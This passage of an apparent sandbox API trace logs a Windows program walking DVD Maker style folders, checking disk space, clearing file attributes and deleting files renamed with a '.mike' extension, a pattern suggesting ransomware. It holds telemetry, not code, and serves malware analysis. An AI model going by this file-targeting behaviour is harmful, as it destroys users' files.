ftLastWriteTime.dwLowDateTime=0x5540f3f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x47c1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="content-background.png", cAlternateFileName="")) returned 1 [0066.700] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72701fd0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72701fd0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5540f3f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11276, dwReserved0=0x0, dwReserved1=0x0, cFileName="header-background.png", cAlternateFileName="")) returned 1 [0066.700] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72701fd0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72701fd0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3126b, dwReserved0=0x0, dwReserved1=0x0, cFileName="passport.png", cAlternateFileName="")) returned 1 [0066.700] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7272812d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7272812d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x10e94, dwReserved0=0x0, dwReserved1=0x0, cFileName="Passport.wmv", cAlternateFileName="")) returned 1 [0066.700] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x727e67fe, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x727e67fe, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x58bf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="passportcover.png", cAlternateFileName="")) returned 1 [0066.700] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7279a544, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7279a544, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7254, dwReserved0=0x0, dwReserved1=0x0, cFileName="PassportMask.wmv", cAlternateFileName="")) returned 1 [0066.701] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7279a544, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7279a544, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7254, dwReserved0=0x0, dwReserved1=0x0, cFileName="PassportMask_PAL.wmv", cAlternateFileName="")) returned 1 [0066.701] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x727c06a1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x727c06a1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="passport_mask_left.png", cAlternateFileName="")) returned 1 [0066.701] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x727e67fe, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x727e67fe, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="passport_mask_right.png", cAlternateFileName="")) returned 1 [0066.701] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7274e28a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7274e28a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1aaec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Passport_PAL.wmv", cAlternateFileName="")) returned 1 [0066.701] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72538f74, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72538f74, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x18337, dwReserved0=0x0, dwReserved1=0x0, cFileName="play-background.png", cAlternateFileName="")) returned 1 [0066.701] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72512e17, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72512e17, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbf1, dwReserved0=0x0, dwReserved1=0x0, cFileName="selection_subpicture.png", cAlternateFileName="")) returned 1 [0066.701] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725f7645, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725f7645, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x658e, dwReserved0=0x0, dwReserved1=0x0, cFileName="travel.png", cAlternateFileName="")) returned 1 [0066.702] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7258522e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7258522e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55481813, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x321a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="TravelIntroToMain.wmv", cAlternateFileName="")) returned 1 [0066.702] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725d14e8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725d14e8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xef24, dwReserved0=0x0, dwReserved1=0x0, cFileName="TravelIntroToMainMask.wmv", cAlternateFileName="")) returned 1 [0066.702] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725f7645, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725f7645, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xef24, dwReserved0=0x0, dwReserved1=0x0, cFileName="TravelIntroToMainMask_PAL.wmv", cAlternateFileName="")) returned 1 [0066.702] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725ab38b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725ab38b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55481813, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x37f64, dwReserved0=0x0, dwReserved1=0x0, cFileName="TravelIntroToMain_PAL.wmv", cAlternateFileName="")) returned 1 [0066.702] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725ab38b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725ab38b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55481813, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x37f64, dwReserved0=0x0, dwReserved1=0x0, cFileName="TravelIntroToMain_PAL.wmv", cAlternateFileName="")) returned 0 [0066.702] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0066.702] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.702] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.702] CoTaskMemFree (pv=0x506980) [0066.703] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa820921, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.703] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f2a3ff0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f2a3ff0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x0, dwReserved1=0x0, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0066.703] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f27de93, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f27de93, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4d86, dwReserved0=0x0, dwReserved1=0x0, cFileName="videowall.png", cAlternateFileName="")) returned 1 [0066.703] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0066.704] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0066.705] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.717] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png", dwFileAttributes=0x80) returned 0 [0066.718] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\203x8subpicture.png.mike")) returned 1 [0066.721] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.727] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png", dwFileAttributes=0x80) returned 0 [0066.728] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\videowall.png.mike")) returned 1 [0066.729] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xf10ed0c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xf1113220, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.729] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f2a3ff0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f2a3ff0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x0, dwReserved1=0x0, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0066.729] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f27de93, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f27de93, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4d86, dwReserved0=0x0, dwReserved1=0x0, cFileName="videowall.png", cAlternateFileName="")) returned 1 [0066.729] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f27de93, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f27de93, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4d86, dwReserved0=0x0, dwReserved1=0x0, cFileName="videowall.png", cAlternateFileName="")) returned 0 [0066.730] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0066.730] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.730] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.730] CoTaskMemFree (pv=0x506980) [0066.732] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa761cf6, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.732] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f84b3be, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f84b3be, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0066.732] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87151b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f87151b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x0, dwReserved1=0x0, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0066.732] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8bd7d5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f8bd7d5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0066.732] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8e3932, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f8e3932, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0066.732] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f909a8f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f909a8f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0066.732] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f909a8f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f909a8f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0066.732] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f897678, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f897678, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0066.732] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8bd7d5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f8bd7d5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0066.733] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f84b3be, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f84b3be, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6c2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="softedges.png", cAlternateFileName="")) returned 1 [0066.733] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f897678, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f897678, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdcdf, dwReserved0=0x0, dwReserved1=0x0, cFileName="vignettemask25.png", cAlternateFileName="")) returned 1 [0066.733] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87151b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f87151b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="whiteband.png", cAlternateFileName="")) returned 1 [0066.733] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0066.739] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.743] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0066.745] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\1047x576black.png.mike")) returned 1 [0066.747] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.751] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png", dwFileAttributes=0x80) returned 0 [0066.752] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\15x15dot.png.mike")) returned 1 [0066.754] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.758] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0066.759] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationleft_buttongraphic.png.mike")) returned 1 [0066.761] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.767] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0066.768] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png.mike" (normalized: "c:\\program 